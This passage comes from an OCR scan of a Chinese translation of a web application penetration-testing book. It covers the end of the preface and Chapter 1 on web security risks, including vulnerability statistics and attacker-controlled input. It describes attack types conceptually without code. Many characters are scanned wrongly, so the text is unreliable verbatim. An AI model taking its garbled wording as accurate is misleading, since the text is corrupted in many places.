户 端 cookie 注 入 、SQL 注 入 和 HTTP 请 求 污染 。 有 关 客 户 端 隐私 攻击 的 
内 容 经 过 扩充 ， 将 介绍 浏览 絮 扩 展 技术 和 HTML5 提 供 的 存储 机 制 。 最 
后 ， 男 一 个 新 增 市 将 集中 介绍 不 依赖 任何 特殊 应 用 程序 中 的 漏洞、 针 
对 Web 用 户 的 攻击 。 这 些 攻击 可 以 由 任何 恶意 或 已 被 攻破 的 Web 站 
点 ， 或 位 于 网 络 中 的 适当 位 置 的 攻击 者 实施 。 

第 14 章 新 增 部 分 内 容 介 绍 目 动 化 攻击 过 程 中 遇 到 的 篆 见 障碍 ， 以 
及 如 何 殉 服 这 些 隐 碍 。 许 多 应 用 程序 采用 防御 性 的 会 话 处 理 机 制 来 终 

会 话 ， 使 用 临时 的 反 CSRF 令 牌 ， 或 使 用 多 阶段 过 程 来 更 新 应 用 程序 

状态 。 本 章 将 介绍 一 些 处 理 这 类 机 制 的 新 工具 ， 以 便于 继续 应 用 自动 
化 测试 技巧 。 新 增 节 将 介绍 CAPTCHA 控 件 ， 以 及 一 些 通常 能 够 加 以 
利用 来 破解 这 些 控件 的 常见 漏洞 。 

第 15 章 包含 有 关 错 误 消 息 中 的 XSS 及 利用 解密 提示 的 新 章节 。 

第 16 章 未 进行 任何 更 新 。 

第 17 章 中 的 新 增 节 主要 介绍 基于 云 的 体系 架构 中 的 漏洞 ， 并 更 新 
了 有 关 如 何 利 用 体系 架构 弱点 的 示例 。 

第 18 章 包含 在 应 用 程序 服务 器 和 平台 中 发 现 的 一 些 有 趣 的 新 漏洞 
示例 。 这 些 服务 器 和 平台 包括 Jetty、JMX 管 理 控制 台 、ASPNET、 


Apple iDisk 服 务 器 、Ruby WEBrick Web 服 务 器 和 Java Web 服 务 器 。 另 
一 个 新 增 节 介绍 突破 Web 应 用 程序 防火 墙 的 实用 方法 。 

第 19 章 未 进行 任何 更 新 。 

第 20 章 的 更 新 内 容 将 详细 介绍 基于 代理 的 工具 套件 的 最 新 功能 。 
新 增 节 将 介绍 如 何 传送 不 支持 代理 的 客户 端的 流量 ， 以 及 如 何 减少 因 
使 用 拦截 代理 服务 器 而 在 浏览 器 和 其 他 客户 端 中 出 现 的 SSL 错 误 。 本 
草 还 将 详细 介绍 使 用 基于 代理 的 工具 套件 进行 测试 时 通常 采用 的 工作 
流程 。 此 外 ， 本 章 还 将 讨论 各 种 最 新 web 漏洞 扫描 天 及 在 各 种 情况 下 
使 用 这 些 扫描 需 的 最 佳 方法 。 

第 21 章 的 更 新 内 容 将 介绍 在 整 本 书 中 描述 的 新 的 方法 论 步 骤 。 


需要 的 工具 


本 书 着 重 讨论 渗透 测试 员 在 攻击 Web 应 用 程序 时 所 采用 的 实用 技 
巧 。 阅 读本 书后 ， 你 将 了 解 每 项 攻击 任务 的 细 市 、 它 们 涉及 的 技术 以 
及 它们 为 什么 有 助 于 探查 和 利用 各 种 漏洞。 下 载 某 个 工具 ， 使 用 它 攻 
击 一 个 目标 应 用 程序 ， 并 根据 它 的 输出 结 有 末了 解 应 用 程序 的 安全 状 
况 ， 这 些 内 容 并 不 是 本 书 讨论 的 重点 。 

也 就 是 说 ， 当 实施 我 们 描述 的 步 又 与 技巧 时 ， 你 会 发 现 一 些 有 
用 、 有 时 甚至 是 必 不 可 少 的 工具 。 所 有 这 些 工具 都 可 以 在 因特网 上 找 
到 ， 建 议 你 下 载 并 试用 本 书 介绍 的 每 一 个 工具 。 


同步 网 站 内 容 


本 书 的 同步 网 站 为 http://mdsec.net/wahh， 你 还 可 以 从 
www.wiley.com/go/webhackerze 链 接 到 本 书 的 同步 网 站 ， 其 上 提供 一 些 
掌握 各 种 攻击 技巧 所 需要 的 有 用 资源 ， 你 也 可 以 利用 这 些 资 源 攻 击 真 
实 的 应 用 程序 。 该 网 站 主要 包括 以 下 内 容 : 

口 本 书 列 出 的 一 些 脚本 的 源 代码 ; 

口 本 书 讨论 的 所 有 工具 和 其 他 资源 的 链接 ; 

口 攻 击 一 个 常见 应 用 程序 的 步 又 列表 : 

口 每 章 结束 部 分 提出 的 问题 的 答案 ; 

口 本 书 示 例 中 使 用 的 几 百 个 互动 式 漏洞 “实验 室 *"， 文 付 一 定 费 用 
即 可 访问 ， 可 帮助 你 提升 和 改善 攻击 技巧 。 


其 他 说 明 


Web 应 用 程序 安全 是 一 个 有 趣 而 流行 的 主题 。 对 我 们 而 言 ， 搂 写 
本 书 是 一 种 享受 ， 正 如 每 天 对 应 用 程序 进行 渗透 测试 。 我 们 和 硕 望 ， 在 
学 习 本 书 描述 的 各 种 攻击 技巧 和 了 解 如 何 防 御 这 些 攻击 手段 的 过 程 
中 ， 你 能 够 找到 乐趣 。 

此 外 ， 我 们 在 此 提出 严正 警告 。 在 许多 国家 ， 未 经 所 有 痢 许可 而 
攻击 他 们 的 计算 机 系统 的 做 法 属 非 法 行为 。 如 果 未 经 他 人 同意 ， 执 行 
我 们 描述 的 绝 大 多 数 技巧 可 能 会 触犯 法 律 。 

本 书 作者 为 专业 的 渗透 测试 员 ， 他 们 代表 客户 端 对 Web 应 用 程序 
实施 攻击 ， 以 帮助 强化 应 用 程序 的 安全 。 近 年 来 ， 许 多 安全 专业 人 士 
与 其 他 人 由 于 未 经 许可 而 尝试 或 主动 攻击 计算 机 系统 ， 从 而 犯罪 ,其 
H "我们 强烈 要 求 你 仅 在 法 律 许 可 的 范围 内 使 用 本 
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第 1 章 


Web 应 用 程序 安全 与 风险 


Web 应 用 程序 安全 无 疑 是 当务之急 ， 也 是 值得 关注 的 话题 。 对 相 
天 各 方 而 言 ， 这 一 问题 都 至 关 重 要 。 这 里 的 相关 各 方 包括 因特网 业务 
收入 日 益 增 长 的 公司 、 向 Web 应 用 程序 托付 敏感 信息 的 用 户 ， 以 及 通 
过 鳃 取 文 付 信息 或 入 侵 银行 账户 偷 镭 巨额 资金 的 犯罪 分 子 。 可 靠 的 信 
誉 也 非常 重要 ， 没 人 愿意 与 不 安全 的 Web 站 点 进行 交易 ， 也 没有 组 织 
愿意 披露 有 关 其 安全 方面 的 漏洞 或 违规 行为 的 详细 情况 。 因 此 ， 获 取 
当前 Web 应 用 程序 安全 状况 的 可 靠 信 息 不 可 小 祝 。 

本 章 简要 介绍 Web 应 用 程序 的 发 展 历 程 及 它们 提供 的 诸多 优点 ， 
并 且 列 举 我 们 亲身 体验 过 的 在 目前 Web 应 用 程序 中 存在 的 漏洞 ， 这 些 
漏洞 表明 绝 大 多 数 应 用 程序 还 远 远 不 够 安全 。 本 章 还 将 描述 Web 应 用 
程序 面临 的 核心 安全 问题 ( 即 用 户 可 提交 任意 输入 的 问题 ， 以 及 造 
成 安全 问题 的 各 种 因素 。 最 后 讨论 web 应 用 程序 安全 方面 的 最 新 发 展 
趋势 ， 并 预测 其 未 来 的 发 展 方向 。 


1.1 Web 应 用 程序 也 on 


在 因特网 发 展 的 早期 阶段 ， 万 维 网 (World WideWeb) 仅 由 Web 站 
点 构成 ， 这 些 站 点 基本 上 是 包含 静态 文档 的 信息 库 。 随 后 人 们 发 明了 
Web 浏 览 器 ， 通过 它 来 检索 和 显示 那些 文档 ， 如 图 1-1 所 示 。 这 种 相关 
言 息 流 仅 由 服务 器 同 浏 览 器 单 向 传送 。 多 数 站 点 并 不 验证 用 户 的 合法 
t, 因为 根本 没有 必要 这 样 做 ;所 有 用 户 同等 对 答 提供 同样 的 信 
息 o 创建 一 个 Web 站 点 所 带 来 的 安全 威胁 主要 与 Web 服 务 An ek EFAS 
(诸多 ) 漏洞 有 关 。 攻 击 者 入 侵 Web 站 点 并 不 能 获取 任何 敏感 信息 ， 
因为 服务 器 上 保存 的 信息 可 以 公开 查看 。 所 以 攻击 者 往往 会 修改 服务 
铬 上 的 文件 ， 以 焉 曲 Web 站 点 的 内 容 ， 或 者 利用 服务 器 的 存储 容量 和 
带宽 传播 “非法 软件 ”。 


Paul Wrights Future Employer Page - Mozilla Firefox 
Ede Edit View History Bockmarks Tools Help 


ve 了 Gs 全 http:/jwww.ukcert org.uk/paul 
Paul Wrights Future Employer Page 


fa fon x") 


Dear prospective future employer, 


This is the C' 7 site of Paul Michael Wnght Oracle Secunty Consultant, Developer and Forensic Analyst for NGS 
tware m Sutton, Surrey (South London) where I have worked for the last two years aad previously in a smalar 
role & or Pentest Ltd of Cheshire. I am a non-smoking, Bish, 38 year old, mamed mam, relocatable with no crmunal 
ord, disabilities or health problems and can be idenniied by this photograph of my wife and I 

Introductory summary: 


-Consultng to top banks and technology companies on the subject of Oracle security anc gencral IT securcy 
-Responsible for wrting the Oracle secunty checks in NGS SQuzreL for Oracle. 

-Currentiy the most qualified SANS-GLAC person outside of US and Span with 9 certs neluding ths GSM 
speciaised m Oracle Forenses. 


-Credited by Oracle in their April 2007 CPU wath finding and ethically reporting a secunty vulnerabibty in the Oracle 
RDBMS It ave ones more to some fia CPU's 


ress. ISBN 0.9776715.-2- 


-Teacher for 


SANS of C TOE a secunty, Incident Handling and Metasploit courses 
-Author of many papers including a NISR paper on Oracle passwords (in Japaness) 


), Oracle forensics for 
vulnerabilty detection in the SANS Reading Room and the first paper published on the subject of Oracle Forensics at 


图 1-1 包含 静态 信息 的 传统 Web 站 点 


如 今 的 万 维 网 与 早期 的 万 维 网 已 经 完全 不 同 ， Web EAIA Z Ko 
点 实际 上 是 从 用 程序 (RLZ > EID CHK, TEARS ae UM LAN 
之 间 进 行 双 辣 信 息 传 送 。 它 们 支持 注册 与 登录 、 人 金融 交易 、 搜 索 以 及 


用 户 创作 的 内 容 。 用 户 获 取 的 内 容 以 动态 形式 生成 ， 并 且 往 往 能 够 满 
足 每 个 用 户 的 特殊 需求 。 它 们 处 理 的 许多 信息 属于 私密 和 高 度 敏感 的 
信息 。 因 此 ， 安 全 问题 至 关 重 要 如 条 人 们 认为 Web 应 用 程序 会 将 他 
们 的 信息 泄露 给 未 授权 的 访问 者 ， 他 们 就 会 拒绝 使 用 这 个 Web 应 用 程 


Aue 
序 。 
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图 1-2” 典型 的 Web 应 用 程序 


Web 应 用 程序 市 来 了 新 的 重大 安全 威胁 。 应 用 程序 各 不 相同 ， 所 
包含 的 漏洞 也 各 不 相同 。 许 多 应 用 程序 是 由 开发 人 员 独 立 开 发 的 ， 还 
有 许多 应 用 程序 的 开发 人 员 对 他 们 所 编写 的 代码 可 能 引起 的 安全 问题 
只 是 上 略 知 一 二 。 为 了 实现 核心 功能 ，Web 应 用 程序 通常 需要 与 内 部 计 
算 机 系统 建立 连接 。 这 些 系统 中 保存 着 高 度 敏 感 的 数据 ， 并 能 够 执行 
强大 的 业务 功能 。15 年 前 ， 如 有 果 需 要 转账 必须 去 银行 ， 让 银行 职员 帮 
助 你 完成 交易。 而 今天 ， 你 可 以 访问 银行 的 Web 应 用 程序 ， 目 己 完 成 
转账 交易 。 进 入 Web 应 用 程序 的 攻击 者 能 够 镭 取 个 人 信息 ， 进 行 金融 
欺诈 或 执行 针对 其 他 用 户 的 恶意 行为 。 


1.1.1 Web 应 用 常见 功能 


创建 Web 应 用 程序 的 目的 是 执行 可 以 在 线 完成 的 任何 有 用 功能 。 
近 些 年 出 现 的 一 些 Web 应 用 程序 的 主要 功能 有 : 

口 购物 (Amazon) ; 

口 社交 网 络 (Facebook) ; 

口 银行 服务 (Citibank) ; 

口 Web 搜 索 (Google) ; 

口 拍卖 (eBay) ; 

口 博彩 与 投机 (Betfair) ; 

口 博客 (Blogger) ; 

口 Web 邮 件 (Gmail) ; 

口交 互信 息 (Wikipedia) 。 

如 今 ， 使 用 计算 机 浏 贤 器 访问 的 应 用 程序 的 功能 越 来 越 多 地 与 使 
用 智能 手机 或 平板 电脑 访问 的 移动 应 用 程序 的 功能 重合 。 大 多 数 移动 
应 用 程序 都 通过 浏览 器 或 定制 客户 端 与 服务 器 进行 通信 ， 这 些 浏览 露 
或 客户 山大 多 使 用 基于 HITTP 的 API。 应 用 程序 功能 和 数据 通常 在 应 用 
程序 用 于 不 同 用 户 平台 的 各 种 接口 之 间 共 享 。 

除 公共 因特网 外 ， 组 织 内 部 已 广泛 采用 web 应 用 程序 来 文 持 天 键 
业务 功能 。 许 多 这 类 应 用 程序 可 以 访问 各 种 高 度 敏感 的 数据 和 功能 © 
口 用 户 可 以 使 用 HR 应 用 程序 访问 工资 信息 、 提 供 并 接收 绩效 反 
， 以 及 管理 人 员 招 聘 和 纪律 处 分 程序 。 

口 连接 关键 体系 架构 (如 Web 和 邮件 服务 器 ) 的 管理 接口 、 用 户 

站 及 虚拟 机 管理 。 

口 用 于 共享 文档 、 管 理工 作 流程 和 项 目 、 跟 中 问题 的 协作 软件 。 

这 些 功能 通常 涉及 重要 的 安全 和 监管 问题 ， 而 且 组 织 结构 大 多 完全 依 
赖 于 它们 的 Web 应 用 程序 内 置 的 控件 来 实现 这 些 功能 。 

口 企业 资源 规划 (ERP) 软件 等 业务 应 用 程序 ， 这 类 应 用 程序 以 
于 使 用 专用 厚 客 户 端 应 用 程序 访问 ， 现 在 则 可 以 通过 Web 浏 拓 事 进行 
访问 。 

口 电子 邮件 之 类 的 软件 服务 ， 这 类 服务 最 初 需要 独立 的 电子 邮件 
客户 端 ， 现 在 可 以 通过 Web 接 口 (如 Outlook Web Access) 访问 。 

口传 统 的 桌面 办 公 应 用 程序 (如 文字 处 理 程序 和 电子 表格 ) 已 通 
过 Google Apps 和 Microsoft Office Live 等 服务 转换 为 Web 应 用 程序 。 

为 降低 成 本 ， 组 织 逐 渐 将 各 种 任务 外 包 给 外 部 服务 提供 两 来 完 
成 ， 因 此 ， 在 上 述 所 有 示例 中 ， 我 们 所 认为 的 “内 部 ”应 用 程序 正 日 益 
由 外 部 机 构 托管 。 在 这 些 所 谓 的 “ 云 ? 解 决 方案 中 ， 业 务 天 键 功能 和 数 
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据 回 数目 更 庞大 的 并 在 攻击 者 开放 ， 而 组 织 却 越 来 越 多 地 依赖 于 不 受 
其 控制 的 安全 防御 。 

大 多 数 计算 机 用 户 所 需要 的 客户 端 软件 仅仅 是 一 个 Web 应 用 程 
序 ， 这 样 的 时 代 即 将 来 临 。 到 那 时 ， 用 户 使 用 一 组 共享 的 协议 和 技术 
即 可 执行 各 种 功能 ， 但 随 之 也 会 出 现 各 种 闻 见 的 安全 凋 洞 。 


1.1.2 ”Web 应 用 程序 的 优点 


Web 应 用 程序 越 来 越 流 行 的 原因 显而易见 。 阁 干 技术 因素 已 经 与 
主要 的 商业 动机 相 结 合 ， 从 而 引发 了 因特网 使 用 方式 上 的 重大 变 单 。 

DHITP 是 用 于 访问 万 维 网 的 核心 通信 协议 ， 它 是 轻 量 级 的 ， 无 须 
连接 。 这 一 点 提供 了 对 通信 和 错误 的 容错 性 。 应 用 HTTP， 许 多 传统 客户 
问 - 服 务 絮 应 用 程序 中 的 服务 器 无 须 再 向 每 一 个 用 户 开放 网 络 连 接 。 
HTTP 还 可 通过 代理 和 其 他 协议 传输 ， 人 允许 在 任何 网 络 配 置 下 进行 安全 
通信 。 

口 每 个 Web 用 户 痢 在 其 计算 机 和 其 他 移动 设备 上 安装 了 浏 咒 器 。 
Web 应 用 程序 为 浏 咒 絮 动态 部 署 用 户 界 面 ， 不 必 像 以 前 的 Web 应 用 程 
序 那 样 需 要 分 配 并 管理 独立 的 客户 问 软 件 。 界 面 变 化 只 需 在 服务 器 上 
执行 一 次 ， 束 可 立即 生效 。 

口 如 今 的 浏 贤 郁 功能 非常 强大 ， 可 构建 内 容 丰 语 并 且 令 人 满意 的 
用 尸 界 面 。Web 界 面 使 用 标准 导航 和 输入 控件 ， 可 保证 用 户 即时 熟悉 
这 些 功能 ， 而 不 需要 学 习 如 何 使 用 各 种 应 用 程序 。 应 用 程序 可 通过 客 
户 半 脚本 功能 将 部 分 处 理 交 由 客户 端 完成 ， 必 要 时 ， 可 使 用 厚 客 户 端 
组 件 任意 扩展 浏览 右 的 功能 。 

口 用 于 开发 Web 应 用 程序 的 核心 技术 和 语言 相对 简单 。 即 使 是 初 
学 者 ， 也 可 使 用 现 有 的 各 种 平台 和 开发 工具 ， 开 发 出 强大 的 应 用 程 
序 ， 还 有 大 量 开源 代码 和 其 他 资源 可 供 整 合 到 定制 的 应 用 程序 中 。 


1.2 Web 应 用 程序 安全 


与 任何 新 兴 技 术 一 样 ，Web 应 用 程序 也 会 市 来 一 系列 新 的 安全 方 
面 的 漏洞 。 这 些 常 见 的 缺陷 也 在 “与 时 俱 进 "， 一 些 开发 人 员 在 开发 现 
有 应 用 程序 时 未 曾 考 虑 到 的 攻击 方式 都 相继 出 现 了 。 由 于 安全 意识 的 
加 强 ， 一 些 问 题 已 经 得 到 解决 。 新 技术 的 开发 也 会 引入 新 的 漏洞 。 
Web 浏 蜗 右 软件 的 改进 基本 上 消除 了 某 些 缺陷 。 

针对 Web 应 用 程序 的 最 严重 攻击 ， 有 是 那些 能 够 披露 敏感 数据 或 获 
取 对 运行 应 用 程序 的 后 并 系统 的 无 限 访 问 权 限 的 攻击 。 这 类 倍 受 有 瞩目 
的 攻击 经 章 发 生 ， 但 对 许多 组 织 而 言 ， 任 何 导 致 系统 中 断 的 攻击 都 属 
于 重大 事件 。 通 过 实施 应 用 程序 级 拒绝 服务 攻击 ， 可 以 达到 与 针对 基 
础 如 构 的 传统 资源 耗 绚 攻击 相同 的 目的 。 但 是 ， 实 施 这 些 攻 击 通 肖 需 
要 更 精细 的 操作 ， 并 主要 针对 特定 的 目标 。 例 如 ， 可 以 利用 这 些 攻 击 
破坏 特定 用 户 或 服务 ， 从 而 在 金融 贸易 、 赌 博 、 在 线 招 投标 和 订 票 等 
领域 寿 得 竞争 优势 。 

在 整个 发 展 过 程 中 ， 不 时 有 报道 知名 Web 应 用 程序 被 攻破 的 消 
思 。 情 况 似 乎 并 未 好 转 ， 也 没有 迹象 表明 这 些 安全 问题 已 经 得 到 解 
决 。 可 以 说 ， 如 今 的 web 应 用 程序 安全 领域 是 攻击 者 与 计算 机 资源 和 
数据 防御 者 之 间 最 重要 的 战场 ， 在 可 预见 的 将 来 ， 这 种 情况 可 能 仍 将 


持续 。 


1.2.1 “ 点 是 安全 的 ” 


人 们 普遍 认识 到 ， 对 Web 应 用 程序 而 言 ， 安 全 确实 是 个 “问题 ”。 
查询 一 个 典型 的 应 用 程序 的 FAQ 页 面 ， 其 中 的 内 容 会 同 你 保证 该 应 用 
程序 确实 是 安全 的 。 

大 多 数 Web 应 用 程序 都 声称 其 安全 可 靠 ， 因 为 它们 使 用 SSL， 例 
如 : 

本 站 点 绝对 安全 。 它 使 用 128 位 安全 套 接 层 (Secure Socket Layer, 


SSL) 技术 设计 ， 可 防止 未 授权 用 户 查 看 您 的 任何 信息 。 您 可 以 放心 
使 用 本 站 点 ， 我 们 绝对 保障 您 的 数据 安全 。 

Web 应 用 程序 常 肖 要 求 用 户 核 实 站 点 证 书 ， 并 想方设法 让 用 户 相 信 其 
所 采用 的 先进 加 密 协 议 无 稀 可 击 ， 从 而 说 服用 户 放 心地 同 其 提供 个 人 
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此 外 ， 各 种 组 织 还 声称 他 们 遵循 支付 卡 行业 (PCI) 标准 ， 以 消 
fs 户 对 安全 问题 的 担忧 。 
列 如 : 

我 们 极其 注重 安全 ， 每 天 扫描 Web 站 点 ， 以 确保 始终 遵循 PCI 标 
准 ， 并 人 免 受 黑客 攻击 。 下 面 的 标志 上 显示 了 最 近 扫 描 日 期 ， 请 放心 访 
问 该 Web 站 点 。 

实际 上 ， 大 多 数 Web 应 用 程序 并 不 安全 ， 虽 然 SSL 已 得 到 广泛 使 
用 ， 且 会 定期 进行 PCI 扫 描 。 最 近 几 年 ， 我 们 测试 过 数 百 个 web 应 用 程 
序 。 图 1-3 说 明了 在 2007 年 和 2011 年 间 测 试 的 应 用 程序 受 一 些 常见 类 型 
的 漏洞 影响 的 比例 。 下 面 简要 说 明 这 些 漏 洞 。 


不 完善 的 身份 验证 措施 
不 完善 的 访问 控制 措施 
SQL 注 入 

路 站 点 脚本 94% 

信息 泄露 


跨 站 点 请 求 伪造 


0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 
He PUP CRS MRD PRUE 
图 1-3 ”我 们 最 近 测 试 的 应 用 程序 中 出 现 的 一 些 常 见 Web 应 用 程序 漏洞 (基于 100 多 个 
样本 ) 


口 不 完善 的 身份 验证 措施 (62%) 。 这 类 漏洞 包括 应 用 程序 登录 
机 制 中 的 各 种 缺陷 ， 可 能 会 使 攻击 者 破解 保密 性 不 强 的 密码 、 发 动 蛮 
力 攻击 或 完全 避 开 登录 。 

口 不 完善 的 访问 控制 措施 (71%) 。 这 一 问题 涉及 的 情况 包括 : 
应 用 程序 无 法 为 数据 和 功能 提供 全 面 保护 ， 攻 击 者 可 以 查看 其 他 用 户 
保存 在 服务 器 中 的 敏感 信息 ， 或 者 执行 特权 操作 。 

OSQLEEA (32%) 。 攻 击 者 可 通过 这 一 漏洞 提交 专门 设计 的 输 
入 , 干扰 应 用 程序 与 后 端 数 据 库 的 交互 活动 。 攻 击 者 能 够 从 应 用 程序 
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口 跨 站 点 脚本 (94%) 。 攻 击 者 可 利用 该 漏洞 攻击 应 用 程序 的 其 
en ele ey 
攻击 。 


口 信息 泄露 (78%) “。 这 一 问题 包括 应 用 程序 泄露 敏感 信息 ， 攻 
击 者 利用 这 些 敏感 信息 通过 有 人 缺陷 的 错误 处 理 或 其 他 行为 攻击 应 用 程 
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口 跨 站 点 请 求 伪造 (92%) 。 利 用 这 种 漏洞 ， 攻 击 者 可 以 诱 使 用 
户 在 无 意 中 使 用 目 己 的 用 户 权 限 对 应 用 程序 执行 操作 。 恶 意 Web 站 点 
可 以 利用 该 漏洞 ， 通 过 受害 用 户 与 应 用 程序 进行 交互 ， 执 行 用 户 并 不 
打算 执行 的 操作 ° 

SSL 是 一 种 出 色 的 技术 ， 可 为 用 户 浏 览 融 和 Web 服 务 占 间 传 输 的 数 
据 提 供 机 密 性 与 完整 性 保护 功能 。 它 有 助 于 防止 信息 泄露 ， 并 可 保证 
用 户 处 理 的 Web 服 务 器 的 安全 性 。 但 SSL 并 不 能 抵御 直接 针对 某 个 应 用 
程序 的 服务 器 或 客户 端 组 件 的 攻击 ， 而 许多 成 功 的 攻击 都 恰恰 属于 这 
种 类 型 。 特 别 需要 指出 的 是 ，SSL 并 不 能 阻止 上 述 任 何 漏 洞 或 许多 其 
他 使 应 用 程序 受到 威胁 的 漏洞 。 无 论 是 否 使 用 SSL， 大 多 数 Web 应 用 程 
序 仍 然 存 在 安全 漏洞 。 


1.2.2 ”核心 安全 问题 : 用 户 可 提交 任意 输入 


与 多 数 分 布 式 应 用 程序 一 样 ， 为 确保 安全 ，Web 应 用 程序 必须 解 
决 一 个 根本 的 问题 。 由 于 应 用 程序 无 法 控制 客户 端 ， 用 户 儿 乎 可 辐 服 
务 硕 问 应 用 程序 提交 任意 输入 。 应 用 程序 必须 假设 所 有 输入 的 信息 都 
征 亚 意 的 输入 ， 并 必须 采取 措施 确保 攻击 者 无 法 使 用 专门 设计 的 输入 
破坏 应 用 程序 干扰 其 逻辑 结构 与 行为 ， 并 最 终 达 到 非法 访问 其 数据 和 
功能 的 目的 。 

这 个 核心 问题 表现 在 许多 方面 。 

口 用 户 可 干预 客户 端 与 服务 闫 间 传 送 的 所 有 数据 ， 包 括 请 求 参 
数 、cookie 和 HTTP 信 息 涉 。 可 轻易 避 开 客户 并 执行 的 任何 安全 控件 ， 
如 输入 确认 验证 。 

口 用 户 可 按 任何 顺序 发 送 请 求 ， 并 可 在 应 用 程序 要 求 之 外 的 不 同 
阶段 不 止 一 次 提交 或 根本 不 提交 参数 。 用 户 的 操作 可 能 与 开发 人 员 对 
用 户 和 应 用 程序 交互 方式 做 出 的 任何 假设 完全 不 同 。 


口 用 户 并 不 限于 仅 使 用 一 种 Web 浏览 器 访问 应 用 程序 。 大 量 各 种 
各 样 的 工具 可 以 协助 攻击 Web 应 用 程序 ， 这 些 工 具 既 可 整合 在 浏览 器 
中 ， 也 可 独立 于 浏览 器 运作 。 这 些 工 具 能 够 提出 普通 浏览 器 无 法 提交 
0 
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在 引起 一 些 应 用 程序 设计 者 无 法 预料 或 不 希望 出 现 的 事件 。 以 下 举例 
说 明 为 实现 这 种 目的 而 提交 的 专门 设计 的 输入 。 
口 更 改 以 隐藏 的 HTML 表 单字 段 提 交 的 产品 价格 ， 以 更 低廉 的 价 
格 欺 诈 性 地 购买 该 产品 。 
口 修 改 在 HTTP cookie 中 传送 的 会 话 令 有 牧 ， 动 持 男 一 个 验证 用 户 的 


口 利 用 应 用 程序 处 理 过 程 中 的 逻辑 错误 删除 某 些 正 第 提交 的 参 


数 。 

口 改 变 由 后 端 数据 库 处 理 的 某 个 输入 ， 从 而 注入 一 个 恶意 数据 库 
查询 以 访问 敏感 数据 。 

勿 庸 置疑 ，S5SL 无 法 阻止 攻击 者 向 服务 器 提交 专 | 设 计 的 输入 。 
应 用 程序 使 用 SSL 仅 仅 表示 网 络 上 的 其 他 用 户 无 法 查看 或 修改 攻击 者 
传送 的 数据 。 因 为 攻击 者 控制 着 SSL 通 道 的 终端 ， 能 够 通过 这 条 通道 
加 服务 万 传送 任何 内 容 。 如 采 前 面 提 到 的 任何 攻击 成 功 实现 ， 那 么 不 
论 其 在 FAQ 中 声称 其 如 何 安全 ， 该 应 用 程序 都 很 容易 受到 攻击 。 


1.2.3 关键 问题 因素 


任何 情况 下 ， 如 采 一 个 应 用 程序 必须 接受 并 处 理 可 能 为 恶意 的 未 
经 验证 的 数据 ， 束 会 产生 Web 应 用 程序 面临 的 核心 安全 问题 。 但 古 ， 
对 Web 应 用 程序 而 言 ， 儿 种 因素 的 结合 使 问题 更 加 严重 ， 这 也 解释 了 
当今 因特网 上 许多 Web 应 用 程序 无 法 很 好 地 解决 这 一 问题 的 原因 。 

1. 不 成 熟 的 安全 意识 

近年 来 ， 人 们 对 Web 应 用 程序 安全 问题 的 意识 有 所 增强 ， 但 与 网 
络 和 操作 系统 这 些 发 展 更 加 完善 的 领域 相 比 ， 人 们 对 Web 应 用 程序 安 
全 问题 的 意识 还 远 不 够 成 熟 。 虽 然 大 多 数 IT 安 全 人 员 掌 握 了 相当 多 的 
网 络 安全 与 主机 强化 基础 知识 ， 但 他 们 对 与 Web 应 用 程序 安全 有 关 的 
许多 核心 概念 仍然 不 其 了 解 ， 甚 至 存 有 误解 。 当 前 ， 在 其 工作 中 ， 
Web 应 用 程序 开发 人 员 往 往 需要 整合 数 十 、 甚 至 数 百 个 第 三 方 数据 
包 ， 寻 致 他 们 无 法 集中 精力 人 研究 基础 技术 。 即 使 是 经 验 丰 富 的 Web 应 


会 话 


用 程序 开发 人 员 ， 也 经 常会 对 所 用 的 编程 框架 的 安全 性 做 出 错误 假 
设 ， 或 过 到 一 些 对 他 们 而 言 完 全 陌生 的 基本 缺陷 类 型 。 

2. 独立 开发 

大 多 数 Web 应 用 程序 都 由 企业 自己 的 员工 或 合作 公司 独立 开发 。 
即使 应 用 程序 采用 第 三 方 组 件 ， 通 常 也 是 使 用 新 代码 将 第 三 方 组 件 进 
行 自 定义 或 拼凑 在 一 起 。 在 这 种 情况 下 ， 每 个 应 用 程序 都 各 不 相同 ， 
并 且 可 能 包含 其 独 有 的 缺陷。 这 种 情形 与 组 织 购买 业内 一 流产 品 并 按 
照 行 业 标准 指南 安装 的 典型 基础 架构 部 署 形成 鲜明 对 照 。 

3. 欺骗 性 的 简化 

使 用 今天 的 Web 应 用 程序 和 开发 工具 ， 一 个 程序 员 新 手 也 可 能 在 
短期 内 从 头 开始 创建 一 个 强大 的 应 用 程序 。 但 是 ， 在 编写 功能 性 代码 
与 编写 安全 代码 之 间 存 在 巨大 的 差异 。 许 多 Web 应 用 程序 由 善意 的 个 
人 创建 ， 他 们 只 是 缺乏 发 现 安全 问题 的 知识 与 经 验 。 

近年 来 出 现 了 一 种 显著 趋势 ， 即 使 用 提供 现成 代码 组 件 的 应 用 程 
序 框架 来 处 理 各 种 常见 的 功能 ， 这 些 功 能 包括 身份 验证 、 页 面 模板 、 
公告 牌 以 及 与 常用 后 端 基础 架构 组 件 的 集成 ， 等 等 。Liferay 和 Appfuse 
束 属 于 这 种 类 型 的 框架 。 使 用 这 些 产 品 可 以 快速 方便 地 创建 可 运行 的 
应 用 程序 ， 而 无 须 了 解 这 些 应 用 程序 的 运行 机 制 或 它们 包含 的 潜在 风 
今 。 这 也 意味 着 许多 公司 会 使 用 相同 的 框架 。 因 此 ， 即 使 仅仅 出 现 一 
个 漏洞 ， 该 漏洞 也 将 会 影响 许多 无 天 的 应 用 程序 。 

4. 迅速 发 展 的 威胁 形势 

Web 应 用 程序 攻击 与 防御 研究 发 展 相 对 不 成 熟 ， 是 一 个 正 鞍 芯 发 
展 的 领域 ， 其 中 新 概念 与 威胁 出 现 的 速度 比 传统 的 技术 要 快 得 多 。 在 
客户 端 方面 尤其 如 此 ， 针 对 特定 攻击 的 公认 防御 机 制 往 往 会 在 一 些 研 
究 中 失去 作用 ， 这 些 人 研究 最 终 成 就 了 新 的 攻击 技巧 。 在 项 目 开 始 之 初 
瓯 完全 了 解 了 当前 威胁 的 开发 团队 ， 很 可 能 到 应 用 程序 开发 完成 并 部 
署 后 会 面临 许多 未 知 的 威胁 。 

5. 资源 与 时 间 限 制 

由 于 独立 、 一 次 性 开发 的 影响 ， 许 多 Web 应 用 程序 开发 项 目 会 受 
到 严格 的 时 间 与 资源 限制 。 通 常 ， 设 计 或 开发 团队 不 可 能 雇用 专职 的 
安全 专家 ， 而 且 由 于 项 目 进程 的 拖延 ， 往 往 要 等 到 项 目 周期 的 最 后 阶 
段 才 由 专家 进行 安全 测试 。 为 了 兼顾 各 种 要 素 ， 按 期 开发 出 稳定 而 实 
